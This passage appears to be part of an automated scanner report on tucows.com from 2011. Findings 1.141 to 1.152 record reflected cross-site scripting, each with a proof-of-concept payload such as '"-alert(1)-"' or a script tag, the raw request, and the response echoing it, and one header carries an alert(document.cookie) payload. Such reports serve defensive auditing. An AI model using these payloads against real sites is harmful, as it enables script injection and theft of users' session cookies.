<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes/themes78125"-alert(1)-"fa4d78589f4/03BlueMeany/styles.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.141. http://www.tucows.com/includes/themes/03BlueMeany/styles.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/themes/03BlueMeany/styles.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8817"-alert(1)-"edfcd1015e9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/themes/03BlueMeanya8817"-alert(1)-"edfcd1015e9/styles.css HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:23:04 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 31785

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes/themes/03BlueMeanya8817"-alert(1)-"edfcd1015e9/styles.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.142. http://www.tucows.com/includes/themes/03BlueMeany/styles.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/themes/03BlueMeany/styles.css

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7526e"-alert(1)-"6df19e35abd was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/themes/03BlueMeany/styles.css7526e"-alert(1)-"6df19e35abd HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:23:12 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 31902

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes/themes/03BlueMeany/styles.css7526e"-alert(1)-"6df19e35abd";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.143. http://www.tucows.com/index.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /index.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3691"-alert(1)-"68987ea07e0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index.htmlb3691"-alert(1)-"68987ea07e0 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:29:20 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/index.htmlb3691"-alert(1)-"68987ea07e0";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.144. http://www.tucows.com/index.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4d0f6"-alert(1)-"63213006432 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index.html?4d0f6"-alert(1)-"63213006432=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:28:32 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 84335

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Free Software and Sh
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/index.html?4d0f6"-alert(1)-"63213006432=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.145. http://www.tucows.com/preview/194850/x22 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /preview/194850/x22

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f2a0f"-alert(1)-"d3b3f7c7cb3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /previewf2a0f"-alert(1)-"d3b3f7c7cb3/194850/x22 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 20:31:02 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=0a1b30a86b03c7fe7a0105c8c64ed6cc; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 0a1b30a86b03c7fe7a0105c8c64ed6cc=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/previewf2a0f"-alert(1)-"d3b3f7c7cb3/194850/x22";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.146. http://www.tucows.com/preview/194850/x22 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /preview/194850/x22

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 212c1"-alert(1)-"9b74dc28a7b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /preview/194850212c1"-alert(1)-"9b74dc28a7b/x22 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 20:31:05 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=4a96b6ea2fb1ff12ea5cbccab443adca; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 4a96b6ea2fb1ff12ea5cbccab443adca=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/preview/194850212c1"-alert(1)-"9b74dc28a7b/x22";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.147. http://www.tucows.com/preview/194850/x22 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /preview/194850/x22

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cd8d"><script>alert(1)</script>19ee22f0cfb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /preview/194850/x222cd8d"><script>alert(1)</script>19ee22f0cfb HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:31:07 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=b05ac0e6be85c735be622d4531a9aaf6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Wed, 09 Sep 2009 11:33:11 -0400
Set-Cookie: b05ac0e6be85c735be622d4531a9aaf6=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 75004

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Download SmartDraw
...[SNIP]...
<a name="own" href="http://www.tucows.com/preview/194850/x222cd8d"><script>alert(1)</script>19ee22f0cfb#frmAddCmt" class="leave_a_comment">
...[SNIP]...

1.148. http://www.tucows.com/preview/194850/x22 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /preview/194850/x22

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46b7e"-alert(1)-"8990b025cf5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /preview/194850/x2246b7e"-alert(1)-"8990b025cf5 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:31:11 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=f13532ef349cd28fcdd6b97f8ca27aca; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Wed, 09 Sep 2009 11:33:11 -0400
Set-Cookie: f13532ef349cd28fcdd6b97f8ca27aca=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 74977

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Download SmartDraw
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 2;
idGet = "194850";
pageTitle = "SmartDraw 7.61";
url = "http://www.tucows.com/preview/194850/x2246b7e"-alert(1)-"8990b025cf5";
_ARTICLE_ID = "";
_SOFTWARE_ID = "194850";
</script>
...[SNIP]...

1.149. http://www.tucows.com/preview/194850/x22 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /preview/194850/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8153d"-alert(1)-"891c6dec5da was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /preview/194850/x22?8153d"-alert(1)-"891c6dec5da=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:30:52 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=4ff504b2daba6b2fa5976c8353e088e5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Wed, 09 Sep 2009 11:33:11 -0400
Set-Cookie: 4ff504b2daba6b2fa5976c8353e088e5=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 74943

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Download SmartDraw
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 2;
idGet = "194850";
pageTitle = "SmartDraw 7.61";
url = "http://www.tucows.com/preview/194850/x22?8153d"-alert(1)-"891c6dec5da=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "194850";
</script>
...[SNIP]...

1.150. http://www.tucows.com/privacy.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /privacy.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a3ab0"-alert(1)-"6b16cc9a4b3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /privacy.htmla3ab0"-alert(1)-"6b16cc9a4b3 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:29:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/privacy.htmla3ab0"-alert(1)-"6b16cc9a4b3";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.151. http://www.tucows.com/privacy.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /privacy.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2e4b0"-alert(1)-"dc8c1805ae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /privacy.html?2e4b0"-alert(1)-"dc8c1805ae=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:28:44 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 36886

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/privacy.html?2e4b0"-alert(1)-"dc8c1805ae=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.152. http://www.tucows.com/sitemap.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /sitemap.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9edf7"-alert(1)-"26f2d744f54 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sitemap.html9edf7"-alert(1)-"26f2d744f54 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:33:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
